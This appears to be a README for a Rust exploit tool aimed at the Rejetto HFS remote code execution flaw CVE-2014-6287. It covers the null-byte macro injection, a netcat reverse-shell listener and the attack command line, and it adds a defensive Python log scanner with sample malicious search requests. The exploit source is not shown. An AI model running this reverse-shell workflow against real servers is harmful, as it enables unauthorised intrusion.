CVE-2014-6287 - Rejetto HTTP File Server RCE Exploit
A Rust implementation of the CVE-2014-6287 exploit targeting Rejetto HTTP File Server (HFS) versions 2.3x before 2.3c.
Vulnerability Overview
CVE-2014-6287 is a critical remote code execution vulnerability in Rejetto HTTP File Server (HFS).
Technical Details
- Affected Software: Rejetto HTTP File Server (HFS) 2.3x before 2.3c
- Vulnerability Type: Remote Code Execution (RCE)
- CVSS Score: 10.0 (Critical)
- CWE: CWE-94 (Improper Control of Generation of Code)
Description
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server allows remote attackers to execute arbitrary programs via a %00 sequence in a search action. Because the null byte cuts short the check findMacroMarker performs on the search string, macro text placed after it is not rejected and is later evaluated by the server's macro engine, which results in command execution on the host.
The exploit works by:
- Crafting a malicious search query containing a null byte (%00)
- Injecting PowerShell commands within macro delimiters {. and .}
- The server processes the macro and executes the embedded PowerShell code
- Establishing a reverse shell connection back to the attacker
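As an added defensive example (not code from this repository), the following Python scans web-server request log lines for the pattern this exploit produces: a search parameter carrying a NUL byte (%00) followed by an HFS macro marker {. ... .}. It also goes one step beyond the description above by percent-decoding repeatedly so a double-encoded %2500 is caught; the log lines and the macro name are constructed placeholders.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample request-log lines (not real traffic): method, target, version, status.
SAMPLE_LOG = """\
GET /?search=report.pdf HTTP/1.1 200
GET /?search=%00{.example_macro.} HTTP/1.1 200
GET /?search=%2500%7B.example_macro.%7D HTTP/1.1 200
GET /?search=%7B.harmless.%7D HTTP/1.1 200
GET /files/notes.txt HTTP/1.1 200
"""

REQUEST_RE = re.compile(
    r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d (?P<status>\d{3})$"
)


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so a double-encoded %2500 still becomes a NUL byte."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_suspicious_search(target: str) -> bool:
    """True when a 'search' parameter contains a NUL byte followed by an HFS macro opener '{.'."""
    query = urlsplit(target).query
    for raw in parse_qs(query, keep_blank_values=True).get("search", []):
        value = decode_fully(raw)
        nul = value.find("\x00")
        if nul != -1 and "{." in value[nul:]:
            return True
    return False


def scan_log(text: str) -> list[str]:
    """Return the request targets of all log lines matching the CVE-2014-6287 pattern."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line.strip())
        if m and is_suspicious_search(m.group("target")):
            hits.append(m.group("target"))
    return hits


if __name__ == "__main__":
    for target in scan_log(SAMPLE_LOG):
        print("suspicious request:", target)
```

A legitimate file search never contains a NUL byte, so a hit from this rule is worth an alert even before the macro text is inspected.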
Usage
Step 1: Set up a Netcat Listener
Before executing the exploit, set up a listener on your attacking machine to catch the reverse shell:
# Replace <LPORT> with your desired listening port
nc -lvnp <LPORT>
Step 2: Execute the Exploit
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]
Required Parameters:
-l, --lhost <LHOST>: Your local IP address (attacker machine)
-p, --lport <LPORT>: Your local port for the reverse shell
-r, --rhost <RHOST>: Target IP address (vulnerable HFS server)
Optional Parameters:
-t, --rport <RPORT>: Target port (default: 80)
Disclaimer
This tool is for educational and authorized penetration testing purposes only. Use responsibly and only on systems you own or have explicit permission to